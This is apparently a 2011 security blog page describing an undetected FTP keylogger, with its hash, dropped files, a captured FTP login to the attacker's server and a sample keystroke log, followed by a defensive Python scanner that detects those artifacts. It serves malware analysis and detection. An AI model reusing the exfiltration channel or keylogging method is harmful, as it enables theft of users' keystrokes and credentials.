This exploit is similar in nature to other browser exploits: Dude is tricked into visiting a webpage hosting the exploit; the exploit gets executed, and then executes other payloads, ultimately downloading a malicious app from a remote location, and dude is 0wned. The only difference here is that the malicious code somehow manages to run at medium integrity level. Duh!!! What are integrity levels? Look here for more details on this subject.

Thursday, May 5, 2011

FTP Keylogger

Rob @ myownangle has posted this FTP keylogger that is not detected by any anti-virus at this time. Did someone say anti-virus is effective 40% of the time? It's 0% effective against any new threats. Signature-based detection is DEAD.

At the time of writing, this malware, 2a61033a34be3dbbf0a3dfefdae4423c, has not been detected by any of the antivirus engines used by VirusTotal: 0 antimalware products out of 42 (0.0%) detected the threat.

Anyway, this is a piece of malware (a keylogger) that uses an FTP server to send out information about the infected machine.
It creates a directory on the FTP server (named after your PC name) and then stores information about the keys pressed by the users.
The malware creates different configuration files (with a .sys extension, but they are text files, not drivers) in C:\WINDOWS\System32\drivers. These files are used by the malware as configuration for sending out information.
It uses an FTP server to send out a file named WinKey-[YOURCOMPUTER_NAME].html (in the system32 directory).

220 ProFTPD 1.3.3d Server (ProFTPD) []
USER win32@video.x10.bz
331 Password required for win32@video.x10.bz
230 User win32@video.x10.bz logged in
250 CWD command successful

The file WinKey-[COMPUTER_NAME] contains the key pressed by the users:

==[notepad.exe]::[Untitled - Notepad]::[18:01:40]==
[MAIUSC]this ...... etc etc etc etc ..... TEXT TEXT TEXT .....
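The artifacts described in this post (text files with a .sys extension dropped in System32\drivers, and a WinKey-<COMPUTER_NAME>.html log whose records start with ==[process]::[window title]::[time]==) are easy to check for on a mounted image or a live host once you know to look. The following Python is an added example written for this page, not code from Rob's post or from the malware itself. It builds a constructed System32-like directory tree in a temp folder, flags .sys files that lack the MZ header every real driver image carries, finds WinKey-*.html logs, and parses their records for review. The sample file contents are constructed placeholders; the record-header format is taken only from the single log excerpt shown above.

```python
import os
import re
import tempfile

# Artifacts from the write-up: a WinKey-<COMPUTER_NAME>.html log in System32 and text
# ".sys" files in System32\drivers. The log's record header is taken from the excerpt above.
WINKEY_NAME = re.compile(r"^WinKey-[^\\/]+\.html$", re.IGNORECASE)
RECORD_HEADER = re.compile(
    r"^==\[(?P<proc>[^\]]*)\]::\[(?P<title>[^\]]*)\]::\[(?P<time>\d{2}:\d{2}:\d{2})\]==$")


def is_pe_file(path):
    """True if the file starts with the 'MZ' DOS stub that every real driver image carries."""
    with open(path, "rb") as f:
        return f.read(2) == b"MZ"


def scan_system32(system32_dir):
    """Return (findings, keylog_paths); findings is a list of (path, reason)."""
    findings, keylogs = [], []
    drivers_dir = os.path.join(system32_dir, "drivers")
    if os.path.isdir(drivers_dir):
        for name in sorted(os.listdir(drivers_dir)):
            path = os.path.join(drivers_dir, name)
            if os.path.isfile(path) and name.lower().endswith(".sys") and not is_pe_file(path):
                findings.append((path, ".sys file without an MZ header: text file posing as a driver"))
    for name in sorted(os.listdir(system32_dir)):
        path = os.path.join(system32_dir, name)
        if os.path.isfile(path) and WINKEY_NAME.match(name):
            findings.append((path, "WinKey-<computer>.html keystroke log"))
            keylogs.append(path)
    return findings, keylogs


def parse_winkey_log(text):
    """Split a WinKey log into (process, window title, time, captured text) records."""
    records, current = [], None
    for line in text.splitlines():
        m = RECORD_HEADER.match(line.strip())
        if m:
            current = [m["proc"], m["title"], m["time"], ""]
            records.append(current)
        elif current is not None:
            current[3] += line + "\n"
    return [(p, t, tm, body.strip()) for p, t, tm, body in records]


def build_sample_tree():
    """Constructed System32-like tree in a temp dir; nothing here comes from a real host."""
    root = tempfile.mkdtemp(prefix="winkey_demo_")
    drivers = os.path.join(root, "drivers")
    os.makedirs(drivers)
    with open(os.path.join(drivers, "ntfs.sys"), "wb") as f:
        f.write(b"MZ" + b"\x90" * 62)                      # stand-in for a genuine PE driver
    with open(os.path.join(drivers, "cfgx.sys"), "w") as f:
        f.write("server=FTP_HOST_PLACEHOLDER\nuser=USER_PLACEHOLDER\n")   # text "driver"
    with open(os.path.join(root, "WinKey-LAB-PC.html"), "w") as f:
        f.write("==[notepad.exe]::[Untitled - Notepad]::[18:01:40]==\n"
                "[MAIUSC]this is constructed sample text\n"
                "==[iexplore.exe]::[Login - Windows Internet Explorer]::[18:05:02]==\n"
                "user\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    findings, keylogs = scan_system32(root)
    for path, reason in findings:
        print(path, "->", reason)
    for path in keylogs:
        with open(path) as f:
            for proc, title, when, captured in parse_winkey_log(f.read()):
                print(when, proc, repr(title), repr(captured))
```

Point scan_system32 at the System32 directory of a mounted image (FTK Imager or ImDisk, as mentioned earlier on this page) rather than the live %SystemRoot% where possible; the MZ check is deliberately crude, since the write-up's point is that these "drivers" are plain text, and it is cheap enough to run over every driver directory on a suspect image.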